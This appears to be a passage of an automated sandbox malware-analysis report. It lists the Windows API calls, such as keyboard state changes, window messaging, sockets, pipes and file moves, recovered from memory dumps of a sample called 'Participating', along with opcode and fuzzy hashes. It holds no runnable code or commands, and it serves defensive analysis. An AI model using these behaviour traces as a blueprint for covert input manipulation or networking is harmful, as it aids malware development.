                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                  • Opcode ID: 41bc30bd5d5119aa4b8309e7df36a5f95fc83ca97966bb1c7afd0cb3a27331ca
                                                                                                                                                                                                                                                                  • Instruction ID: f5b4b7e9aca45919d8f6feb66ebc492640074d171e96ac1e73762493fbce5d79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41bc30bd5d5119aa4b8309e7df36a5f95fc83ca97966bb1c7afd0cb3a27331ca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A671AF74680304EFDB219F54C889FBA7BB5EF09300F188459E95DA7361EB31A980EB31
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00D4B8C0
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00D4B8D5
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00D4B936
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D4B964
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D4B983
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D4B9C4
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D4B9E7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                                                                                                                  • Opcode ID: a9fbda7959066394471252658cff4772d662f93148445e4a9c9601cb05023187
                                                                                                                                                                                                                                                                  • Instruction ID: 96c7c79cab0827d942042cd98bab2a52c02b01e8d34262089821057d7bd2c705
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9fbda7959066394471252658cff4772d662f93148445e4a9c9601cb05023187
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F251E0A05087D53FFB3642348846BBA7EA99F16324F0C848AE1D9458D2C3D8EDC4DB71
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetParent.USER32(00000000), ref: 00D4B6E0
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00D4B6F5
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00D4B756
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D4B782
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D4B79F
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D4B7DE
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D4B7FF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9da004466954587cf13d25cad5fb2f42bb00fcd44ca982f92262eddab3daa80b
                                                                                                                                                                                                                                                                  • Instruction ID: 08e14cef91e466e98a2d77e35af23860ff93bfcb9db9280a4689d851c0c52c2e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9da004466954587cf13d25cad5fb2f42bb00fcd44ca982f92262eddab3daa80b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC51E4A09047D53FFB3283348C55B7A7EA99F55314F0C848AE0D95A8D2D394EC94E771
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00D15F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00D157E3
                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00D1585E
                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00D15879
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00D1589F
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,00D15F16,00000000,?,?,?,?,?,?,?,?,?,00D15F16,?), ref: 00D158BE
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00D15F16,00000000,?,?,?,?,?,?,?,?,?,00D15F16,?), ref: 00D158F7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5365bdfd56867d342325b30486c4fab9d6a574955cf9eefaf60fe55660362643
                                                                                                                                                                                                                                                                  • Instruction ID: cef94440b02165cd2a21a3fa186eeba0865428a0389baac4303352790cf23b1e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5365bdfd56867d342325b30486c4fab9d6a574955cf9eefaf60fe55660362643
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9351A3B1A00649EFCB10CFA8E941AEEBBF9EF48310F14411AE955E7291DB349981CF71
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D030BB
                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D030C3
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D03151
                                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D0317C
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D031D1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                  • Opcode ID: 49842e4551a838d1922ac44736c4510186114feda5dc9871b50ff51c45f4f98f
                                                                                                                                                                                                                                                                  • Instruction ID: c76a843c873edde29e26d909648dc39ad09f43c1bb61d91fa99b5f7d610c24eb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49842e4551a838d1922ac44736c4510186114feda5dc9871b50ff51c45f4f98f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E414F34A003189BCB10DF68C885B9EBBA9EF49354F188155E819AB3D2D731DA15CBB2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D63AD7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63AAB: _wcslen.LIBCMT ref: 00D63AF8
                                                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00D61B6F
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D61B7E
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D61C26
                                                                                                                                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00D61C56
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e8ace72e24a76a59d30280e42e47211a61e149aa965fc4582d93edacb0a7470
                                                                                                                                                                                                                                                                  • Instruction ID: ea7072cda2f1efd6ec7ea1d001768c803684ee90b92b9ae3fd978d9a44fdbf67
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e8ace72e24a76a59d30280e42e47211a61e149aa965fc4582d93edacb0a7470
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB41D235600214AFDB109F28C885BADBBEAEF45324F188059F8499B292D770ED81CBF1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D4D7CD,?), ref: 00D4E714
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D4D7CD,?), ref: 00D4E72D
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00D4D7F0
                                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00D4D82A
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4D8B0
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4D8C6
                                                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00D4D90C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                                  • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                  • Opcode ID: 2291d71925249a0ed8ec01c81b6392224ced8e7c48f3411298b570ebad41cd83
                                                                                                                                                                                                                                                                  • Instruction ID: 64719d3c1aaac1dd8cce2ae19959196ee8e2a6dba1e42245b33348983ea32a36
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2291d71925249a0ed8ec01c81b6392224ced8e7c48f3411298b570ebad41cd83
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 424156719052189FDF12EFA4D985BEE77B9EF08340F1404E6A509EB141EB35A788CB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D738B8
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D738EB
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D73920
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D73952
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D7397C
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D7398D
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D739A7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                  • Opcode ID: 468a91e01277d83c00e6ac927b9416a037d9d4bc72b2d1a712e19204f08e3f99
                                                                                                                                                                                                                                                                  • Instruction ID: b9c6bdda95d256371dcf9c1db6beef72511fb132c1ec42272faf7412b5f779f0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 468a91e01277d83c00e6ac927b9416a037d9d4bc72b2d1a712e19204f08e3f99
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D313431644255EFDB258F48DC85F6837A1FB8A710F1942A4F619CB2B1EB70AD84EF21
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D480D0
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D480F6
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00D480F9
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00D48117
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00D48120
                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00D48145
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00D48153
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7cfaa38fc3946f0edac08d750a94389af488a18b9bfe74feb0f8802f33864f85
                                                                                                                                                                                                                                                                  • Instruction ID: 25ec6bc7211fe126349658a1de31c6b85457b0575b5ada244c9d0af30582fe35
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cfaa38fc3946f0edac08d750a94389af488a18b9bfe74feb0f8802f33864f85
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF217472600319AFDF109BA8CC84DAE77ADEF093647448426F919DB290DA70DC869770
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D481A9
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D481CF
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00D481D2
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32 ref: 00D481F3
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32 ref: 00D481FC
                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00D48216
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00D48224
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                  • Opcode ID: 35ad830419d1a9bac05eb089d28e4eb1037b562af0106518f838e771a2b7ca6f
                                                                                                                                                                                                                                                                  • Instruction ID: 3fa6ba6081a20c70d2c41bf857311e8cb3a407f81300a3787b3046cc070aac68
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ad830419d1a9bac05eb089d28e4eb1037b562af0106518f838e771a2b7ca6f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24217475604704BFDB109BA8DC89DAE77ECEF093647448125F909CB2A1EA70EC81D774
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00D50E99
                                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D50ED5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                  • String ID: nul
                                                                                                                                                                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                  • Opcode ID: 2d1e8107116b1c3bf4b052d56e1d403cfc3b2bdb38d3d160318a55ff0d93a00a
                                                                                                                                                                                                                                                                  • Instruction ID: eb0996c772765535d15b795803d4ae039657de653949cc5685aa8aedaa89de72
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d1e8107116b1c3bf4b052d56e1d403cfc3b2bdb38d3d160318a55ff0d93a00a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94213D7050030AABDF208F25DC05A9A7BB9BF55721F244A59FCA5E72D0E770D949CB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00D50F6D
                                                                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D50FA8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                  • String ID: nul
                                                                                                                                                                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                  • Opcode ID: 27fb9bbe6b0f09c3642e6f4297f99dd7ac0bc9aca652e2e4af5832da77017637
                                                                                                                                                                                                                                                                  • Instruction ID: c1ed5dcbd57cb420e9f723504f5978193a052276e1b4e30b1ed45590f84e8b7c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27fb9bbe6b0f09c3642e6f4297f99dd7ac0bc9aca652e2e4af5832da77017637
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD217F755403459BDF208F688C04A9A7BB8BF55722F240A19FCA1E32D4E770D989DB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00CE78B1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: GetStockObject.GDI32(00000011), ref: 00CE78C5
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CE78CF
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D74BB0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D74BBD
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D74BC8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D74BD7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D74BE3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
